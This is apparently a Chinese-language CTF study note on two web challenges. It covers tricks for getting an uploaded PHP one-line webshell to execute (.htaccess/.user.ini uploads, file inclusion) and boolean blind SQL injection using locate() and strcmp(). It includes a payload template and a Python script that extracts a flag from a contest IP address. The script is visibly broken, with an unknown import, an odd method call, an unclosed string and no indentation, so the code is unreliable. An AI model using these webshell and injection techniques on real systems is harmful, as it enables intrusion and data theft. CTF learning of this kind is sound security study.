文章目录
2022/10/2 升级赛-web
学到的知识点:
第一题:文件上传漏洞+文件包含漏洞
- 传入一个无法解析的一句话木马后,可以尝试
(1)上传.htaccess或.user.ini文件。
(2)还是无法解析的话,可以查找每个页面的源代码,看看有没有文件包含漏洞。
(3)还是无法解析的话,可以尝试查找服务器用的php版本、中间件版本等,看该版本下有没有漏洞。
- 上传文件后,可以查看以下网页源代码,有可能会返回文件上传后的位置
- 上传文件后,可以尝试访问以下该文件,看传入后的文件中的某些字符是否被过滤或修改,如有修改,则可以尝试传一些其他的一句话木马。
第二题:布尔盲注
- locate函数可以用于布尔盲注,局限性,表中只能有一个表项,否则就会返回错误。
payload:id=‘{}’/(select(locate(binary(‘{}’),结果所在列名,{}))from(结果所在表名))/‘1’
第一个和第三个位置,填入盲注的字符的位置;第二个位置填入盲注使用的字符的二进制编码(因为在传入普通字符串的时候,locate函数是大小写不敏感的,所以需要使用binary函数转换为二进制字符串来处理)
- strcmp函数可以用于布尔盲注
import requests as req
import pytricks
import string
chars = ' !"#$%&\'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz'
# chars = string.ascii_letters + string.digits + "_{}"
ans = 'flag{'
j = 0
for pos in range(1,80):
for ch in chars:
t = (ans + ch)
t = t.ascii_format("char(%d)",",")
t = f"concat({
t})"
payload=f"""'and(pow(999,bin(strcmp((select(flag)from(flag)),binary({
t}))))
res = req.post('http://124.16.75.162:31012/',params={
"id":payload})
if 'error 1690' in res.text:
ans += chr(ord(ch)-1)
break
if 'hack' in res.text:
print("hack")
exit()
if 'error ' in res.text:
print(res.text)
exit()
print(ans)
- 常见的flag所在表名和列名为flag,即select flag from flag